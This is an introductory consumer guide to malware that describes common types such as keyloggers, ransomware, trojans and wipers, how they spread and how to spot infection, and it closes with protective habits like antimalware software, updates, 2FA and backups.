Malware 101

Introduction

It’s no surprise that the internet isn’t a completely safe place and though the good that comes from the internet and its powers of connectivity outweigh the bad, the variety of bad keeps growing. Bad actors develop various types of malware in the hope it infects your device for them to profit from or cause you harm (usually both). Fortunately, cybersecurity software companies are becoming increasingly responsive and coupled with a few changes to your own online habits, you can greatly reduce your exposure to these annoying elements of online life.

What is Malware?

The term ‘malware’ is a contraction of malicious software and refers to software which is designed to intentionally cause damage or gain access to a computer, server, or network. There are a number of different types of malware (outlined in the section to follow) which are usually delivered in a file that needs to be opened or a link that needs to be clicked on for the malware to execute and infect your device or system.

Malware, to be defined as such, requires the criterion of malicious intention to be met. If a piece of software causes damage unintentionally because of some kind of development deficiency, weakness, or oversight, it’s considered a ‘software bug’ and not malware.

What types of Malware exist?

There are many types of malware with new types and modified variations of existing types being created as legacy ones become easier to identify or prevent against. The nine we’ve listed below, in no particular order, are the most common types the typical internet user should be most aware of or otherwise more likely to be exposed to.

Keylogger:

Keylogger malware records a user’s strokes on their keyboard and mouse storing the gathered information and sending it back to the bad actor who deployed it. This is a way to gain usernames, passwords, credit card numbers and similar valuable or sensitive data. The scary thing is that every keystroke and mouse click can be recorded – even if you backspace or delete what you typed.

This is compounded by the face that they are not illegal pieces of software so not all antimalware software is perfect at differentiating between legitimate and malicious keyloggers. Examples of legitimate keyloggers include:

Employers can purchase legitimate keyloggers for company provided devices to ensure employees are not accessing personal or banned websites and nor are not spreading intellectual property. This is why we recommend keeping your work and personal devices and accounts separate in our article about good password hygiene
Parental control software which is used by parents to monitor their children’s use of the internet to ensure they are safe from exploitation, grooming, visiting explicit websites, etc. There are different types of software but many rely on keyloggers for monitoring
Other similar software to the above used for investigations by law enforcement or spousal tracking if one suspects the other is having an affair for example. This would be something Culprit #2 from our article The less obvious ways bad actors can access your data would do
Programs that require users to use key commands for certain functions, these programs rely on a keylogger to identify each command.

Ransomware:

Ransomware, sometimes called ‘scareware’, is a rather aggressive type of malware. Once this form of malware infects a device it encrypts the system and locks the user out until the user pays a ransom to the bad actor via cryptocurrency to get access to their system back. Ransomware can become very expensive for high net-worth individuals and organisations; however everyday civilians are also targeted. Ransomware is often distributed via a phishing link and the code for it is easily attainable for purchase on the Dark Web (as is the code for other types of malware).

Spyware:

Spyware as the name suggests, hides on the infected device and monitors what the user does on that device, it tends to be discreet as its intent is not to disrupt the user. Spyware primarily records relevant data on the users interests and habits but can also record passwords, communications and credit card numbers. Spyware is also used by everyday people wishing to spy on their spouse, children, or employees.

Virus:

Viruses are probably the one everyone has heard of; viruses attach their malicious code to existing clean code causing damage the core functionality of a system resulting in corrupted or deleted files and the issues which stem from that. Viruses tend to appear as an .exe (executable file), meaning they can sit dormant on a device until the user, usually inadvertently, runs that file. Viruses can replicate themselves by modifying other computer programs and infecting them with their malicious code.

Adware:

Adware is designed to aggressively push unwanted adverts (usually pop-ups) to the user in such a manner that the only way to get rid of them is to click through the adverts. The bad actors benefit financially from each click but not from the victim. Adware is more annoying rather than threatening to personal data or the device itself, however it can lead to unsafe websites or places where other types of malware are waiting.

Fileless:

Fileless malware is the most difficult to detect as it leaves no malware files or processes (or any real footprint) on the infected system. These are designed to abuse trusted system files already built-in to the operating system and thus they operate from the device memory rather than a file as with the other types of malware. Traditional antimalware scans can’t pick them up for this reason and they can disappear when the computer is rebooted making them difficult to track forensically.

Trojan:

Trojan, or ‘Trojan Horse’, is one of the most common types of malware and aptly get its name from the famous story from The Trojan War. This form of malware disguises itself as a legitimate, helpful, or otherwise reputable piece of software to trick users into thinking it’s safe to download. It is one of the more discreet forms of malware however once installed it can capture a wealth of data up to and including user passwords, financial information, and other such sensitive data and send it all back to the bad actor who deployed it. It can also create backdoors in your device security to let other malware in, however trojans themselves tend not to be self-replicating.

Worm:

Worm malware is designed to move from one system to another without detection by any users along the way. They find security weaknesses in software or operating systems so as to not require user interaction to function.

Wiper:

Wiper malware is designed to completely erase all data from its targeted device or server after the data has been sent back to the bad actor who deployed the wiper. The intention is usually sabotage or competitive advantage through theft of Intellectual Property and targets tend to, but not always, be corporations.

What can malware be used for?

Broadly speaking malware has the power to access data, encrypt it, delete it, send it somewhere, alter computer functions, gain login credentials, and spy on what a user does on their device. All of this is done behind the scenes and often, particularly with newer malware, users can’t tell any change in the performance of their device until it’s too late. More specifically though bad actors use malware to:

Make money through the work malware is designed to do
Profit by selling malware code on the Dark Web
Steal personal, financial or business information from government targets
Steal personal information, passwords, credit card numbers, and other sensitive or incriminating files from civilian targets. This is a big way to allow for doxing the victim.
Take control of a user’s device
Monitor the actions of a user on their device
Read our What is it that bad actors want? article for more insights about what they’re chasing and how they use malware to achieve their goals

Malware though can also be used to:

Test security vulnerabilities of upcoming and existing software
Shut down computers of bad actors / paedophiles / drug dealers and other operators on the Dark Web and essentially apply the same points from above to illegal behaviour.

Malware can be spread through several different, usually disguised, methods including:

Email attachments: An email might claim the user is being summoned to court with attached documents being infected.
Phishing links
Advertising links
Apps
Software installations
USB drives: sometimes intentionally left outside of targeted organisations in the hope someone will pick it up and plug it into a networked computer.
Text messages

How to tell if a device is infected with malware?

Scanning with antimalware software is obviously the best way however there are some obvious flags too:

Slow device performance, frequent freezing, the dreaded ‘blue screen of death’, a lag between a keystroke and the character appearing on the screen. These are all especially noticeable with older devices
Frequent pop-up adverts
Issues or lag in shutting down or starting up a device
Suspicious warnings of infection followed by a solution to fix it
The browser redirects to websites the user wasn’t intending to visit
New toolbars or extensions appear in your browser, new processes in your Task Manager, or new programs in your applications folder. Search them online to check and uninstall them if they are suspect
Loss of access to accounts / password no longer works
Bogus new charges on the bill
Mobile users: suddenly reduced battery life
Mobile users: your contacts report receiving strange calls from your number
Mobile users: unexpected increase in data usage

How to protect yourself from malware

Before we get to the tips we wanted to dispel some common myths because protecting yourself from malware doesn’t come from choosing a certain operating system. Whilst it is a consideration as you’ll soon see, its rightful place should be further down the list, it’s too common to hear people say they prefer MacOS because it’s far safer than Microsoft Windows OS with regards to malware. This is true in relation to viruses specifically however the gap is closing rapidly when it comes to the other types of malware such as adware, spyware, trojans, or keyloggers for example. Linux tends to be considered the safest in this regard however that’s due to its fractional market share compared to MacOS or Windows.

Bad actors tend to create malware for the most used systems to increase their pool of potential victims. However, Linux has a bit of a learning curve and isn’t recommended for people who are not tech savvy. As such a Linux system can still get malware if the user hasn’t set up their device securely which is harder to do than Windows or MacOS devices which most people have familiarity with.

The point we’re making is an important one – your habits play a bigger role in protecting your device from malware than the operating system you choose. Whilst the highest amount of malware is created for Windows, a security conscious Windows user can be more secure and better protected against malware than someone using MacOS or Linux nonchalantly when it comes to cybersecurity.

Another myth is that laptops and desktops are more vulnerable than smartphones. While it is true that iPhone users suffer much less malware attacks than their Android counterparts due to Google’s larger share of the mobile market and Apple’s closed garden approach to apps. It must not go forgotten we are talking about the state of affairs today as of this writing, a smartphone has more real time tracking capability, recording capability and image capture capability than a desktop or laptop – making smartphones a more valuable target for malware now but especially into the future.

With malware advancements a smartphone, even an iPhone, may turn against its user, so iPhone users you’re still ahead from a risk-likelihood perspective but it’s not such a small risk to ignore anymore. iPhone users can also be victims of scam phone calls and text messages with links to fraudulent websites which capture login credentials and similar scams. These aren’t directly malware infections of course but the point we’re directing towards is similar to the one earlier about operating systems. The choice of an iPhone smartphone isn’t a huge cybersecurity advantage – we’re not bashing iPhones here by the way, we’re just saying they’re not as secure as public sentiment would suggest.

Mobile users broadly are also more vulnerable as they tend not protect smartphones as diligently as desktops or laptops. This may be due to the disposable nature (lower anticipated life) and lower purchase price of smartphones in comparison to desktops and laptops. This type of Security Fatigue can lead to malware infecting a mobile phone through simple carelessness.

The best things you can do are listed below, the first two are almost non-negotiable if you want to be serious:

Having some form of antimalware software is the strong precaution to consider with the best on the market updating protection against new threats every few days (through cloud updates and thus quicker than the software patches outlined next). Most antivirus programs on the market come with protection against the all types of malware (spy, ad, etc) amongst other security focused features
Keeping software up to date! We know this tip is so common it’s almost worth an eyeroll. Software updates though are mostly a combination of two things- usability enhancements and, more importantly, security improvements and patches. Indeed, Microsoft has upgraded its Windows Defender package to detect irregular activity from PowerShell which is used by the Fileless malware outlined earlier. Update software as soon as updates are released as they’re usually created on the knowledge of the latest threats. Bad actors look for known vulnerabilities in outdated software making those suffering from Security Fatigue and not updating an easy target. There are free versions also available but they may not get updates as regularly as paid options. Check out our article on the importance of software updates here.
Implement 2FA on your accounts to protect against keyloggers as access to an account isn’t granted with just a username and password, a bad actor would need the other authentication factor to get in
Use a browser extension adblocker: Many browsers have adblocker extensions as options as well as other options and plugins to support blocking malware
Be aware of phishing scams and keep that at the forefront of your mind when scanning your inbox. Email is one of the main methods for delivering most forms of malware
Back up your most important files regularly, this can be as easy as backing up to a USB drive once a month and keeping that USB drive locked in a secured safe. Backing up to a secure cloud provider is also an option in this regard.
Download software only from a reputable source such as your operating system’s native ‘app store’
Don’t ‘enable macros’ if a download asks you to unless you are 100% sure what those macros do, read this article for more information about enabling macros
Never click on a pop-up advert, close the browser with the site that generated it.
Limit the apps on your devices, delete ones you no longer use or need.
Research apps before downloading them, any user review claiming a change to system performance should be a flag

Conclusion

A combination of protective tools and user vigilance is the best way to protect and guard against the threat malware poses. Respect all devices you have with internet connectivity from a security standpoint – especially IoT devices (see the first link under Further Reading below as to why). Take this under advisement when purchasing antimalware software (antivirus / antimalware software). If you use a combination of MacOS, Windows, and Linux run devices for example ensure the software is compatible with all three operating systems as modern antimalware software offers users a number of devices to install on. The use of reputable antimalware software and ensuring software updates are done as soon as they are released are the two best precautions to take.

Introduction

What is Malware?